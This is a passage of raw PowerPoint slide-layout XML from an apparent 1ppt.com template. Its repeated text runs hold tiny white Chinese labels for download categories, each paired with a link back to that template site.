              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout264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64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64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64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6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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout265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65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65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65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65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65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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout265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65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65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65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6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66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66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66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66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66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66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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
